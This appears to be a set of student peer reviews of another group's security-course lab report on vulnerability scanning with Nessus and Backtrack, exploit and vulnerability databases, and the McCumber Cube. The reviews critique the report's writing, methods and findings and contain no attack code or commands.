I think that group 2’s write-up for lab 4 was very good. The abstract for this lab was good and accurately described the laboratory. The literary review was good and adequately reviews the material. Group 2 answered all of the required questions for each reading. All of the citing for the literary review was done correctly. For part 1, the group answered all of the required questions and looked at and tested many different stand-alone tools to back up their claims. Part 2 answered all of the required questions as well, however, the group did not find exploit databases but rather vulnerability databases. Even still, the group actually discussed exploit code and how it differs from a vulnerability. The group also included a very extensive table that indicates many vulnerabilities and how they relate to the McCumber Cube. Finally, the conclusion was written well and accurately sums up the laboratory.
Team 2 starts off with their abstract, defining what is going to be accomplished within the lab and what tools they will be using. They chose to use Nessus and Backtrack 3, based on what they had learned in the previous lab. They then go on to their literature review, and in the first paragraph discuss security vulnerabilities and how they present issues to systems and services. Then they discuss the ranking systems within the different articles. This raised a question: what does the team think would be a good system for ranking vulnerabilities? Would it be useful to include the McCumber cube coordinates and OSI seven-layer model locations? They then go on to the methodologies and describe what they are going to be working with in this section. They were smart in reusing the exploits found in the last lab and applying that information to the additional tools. But was Nessus up to date enough to find vulnerabilities within the system? And were any other tests run against the operating systems within their virtual environment? They then go on to describe the databases that they found and discuss each of them. With all the different databases that are available, does the group believe there should be a standard database? Or is it good that there are numerous databases, some paid and some not? The group also explains that some of the tools do not work the same because they are in a controlled environment. Would the teams get different results if these networks were connected to the Internet? They then discuss the issues they had with Backtrack and the limitations they encountered when they tried to use some of the tools. At the end they conclude their lab with what they had found for the various layers of the table. When looking at the vulnerabilities for the applications and operating systems, what is the biggest issue through them all? Could some of the problems that each group found be resolved before release? One opinion in teaching programming is that security should be considered as the application is developed, throughout the development life cycle (http://www.devx.com/security/Article/30637). Is this a good idea for future programmers to keep in mind? Overall the team did a good job and met most of the lab requirements; there were just a couple of things missing. I noticed that only one operating system was tested, or at least that is what I gathered from the reading. Were the other operating systems tested? If they were, it would be good to see any differences between them.
Team two’s abstract feels like a list of learning objectives. I wouldn’t read any farther if I wasn’t required to. Watch syntax poor grammar and spelling hurt the overall delivery.
I understand that the team is trying to integrate the articles into one cohesive literature review, but the way the discussion bounces between them is confusing. What do you think of what He and Bode have to say? Is it of any value? Are they on the right track? You transition quickly and rather poorly into Davidson's article. The process Davidson lays out is as dissimilar to He and Bode's flowchart as it is similar. I don't think Davidson was talking about just reconnaissance with the baseline test; I think he was looking at a full penetration test of the system with the manufacturer's default settings. Why are we assuming Davidson didn't look at Thompson and Chase? Are you saying that Davidson didn't have a vulnerability scoring mechanism in place? Did you read to the end of the article? I think you are trying to make artificial comparisons between Davidson and Thompson and Chase. They were really doing two separate but related things.
I have no idea what the group is trying to accomplish in the first part of the methods section. What am I looking at? What's the point? I could reproduce the steps in Backtrack, but what am I attacking, and again, why? The methodology for part two of the lab is better, but still not entirely clear.
Your findings for the first part of the lab are as bad as the methods section. Retracting information? Do you mean retrieving? I understand you used Medusa; shouldn't you have explained (clearly) how it works in the methods section? You were also trying to explain the lab setup, which likewise belongs in methods. What was the end result? What did you get from performing the tests you theoretically outlined in the methods section?
When discussing part two, you keep referring to Bugtraq as a code repository. Is it really or is it something else? I like the table you created for part two, and I agree with the majority of your findings listed in it. The problem I see comes from the team looking for exploit code in the methods, but ending up with vulnerability databases in the findings. You attempt to define vulnerability and exploit and then appear to use them arbitrarily for the same thing. Is there a difference?
The issues section is garbled. Something was wrong with Backtrack and you had to recompile? The conclusion overall is simple but well stated; it lets the reader know what you learned and what was accomplished. Your conclusion for part one of the lab is surprisingly good given the rest of the information. In part two, I think your methods may have led you to false conclusions regarding vulnerabilities. While denial of service is surely common, what about exploits used to gain access (authentication) and/or breach confidentiality?